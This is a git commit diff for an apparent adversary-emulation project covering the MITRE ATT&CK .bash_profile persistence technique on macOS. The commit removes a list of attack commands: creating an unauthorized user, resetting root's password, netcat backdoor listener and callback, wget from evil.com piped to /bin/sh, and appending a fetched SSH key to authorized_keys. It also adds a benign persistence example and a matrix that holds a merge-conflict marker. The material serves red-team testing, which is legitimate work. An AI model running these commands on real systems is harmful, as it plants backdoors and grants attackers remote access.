Fixing .bash_profile
* Removed commands not related to this technique, and replaced them with legitimate ones. * Added .bash_profile page to Macpatch-4
parent
4cd236a438
commit
0e877849ef
|
@ -2,19 +2,5 @@
|
||||||
|
|
||||||
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
|
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
|
||||||
|
|
||||||
* Adding an unauthorized user (useradd)
|
echo "/path/to/script.py" >> ~/.bash_profile
|
||||||
* `useradd test && echo test:testpass | chpasswd`
|
echo "/path/to/script.py" >> ~/.bashrc
|
||||||
* Changing the password to an existing user (noisy, passwd)
|
|
||||||
* `echo root:NoLogon | chpasswd` (use nologon as pass word for a tiny bit of obscurity)
|
|
||||||
* Create a backdoor listener (netcat)
|
|
||||||
* `nc –nlp 8080`
|
|
||||||
* Create a backdoor callback (netcat)
|
|
||||||
* `nc 192.168.0.1 8080`
|
|
||||||
* Retrieve commands from a C2 server (wget or curl)
|
|
||||||
* `wget https://evil.com/more/commands.txt | /bin/sh`
|
|
||||||
* Download additional tools and execute (wget or curl)
|
|
||||||
* `wget https://evil.com/bad/executeable | /bin/sh`
|
|
||||||
* Add key to authorized_keys file (paste or get from remote server)
|
|
||||||
* `echo $(wget https://evil.com/bad/ssh/key.txt) >> ~/.ssh/authotized_keys`
|
|
||||||
* Set an alias to do additional tasks
|
|
||||||
* `alias ls='ls –al & <any command from above>'`
|
|
||||||
|
|
|
@ -0,0 +1,6 @@
|
||||||
|
# .bash_profile and .bashrc
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
|
||||||
|
|
||||||
|
echo "/path/to/script.py" >> ~/.bash_profile
|
||||||
|
echo "/path/to/script.py" >> ~/.bashrc
|
|
@ -3,7 +3,7 @@
|
||||||
|
|
||||||
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||||
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||||
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md ) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
|
| [].bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md ) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
|
||||||
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
|
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
|
||||||
<<<<<<< HEAD
|
<<<<<<< HEAD
|
||||||
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
|
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
|
||||||
|
|
Loading…
Reference in New Issue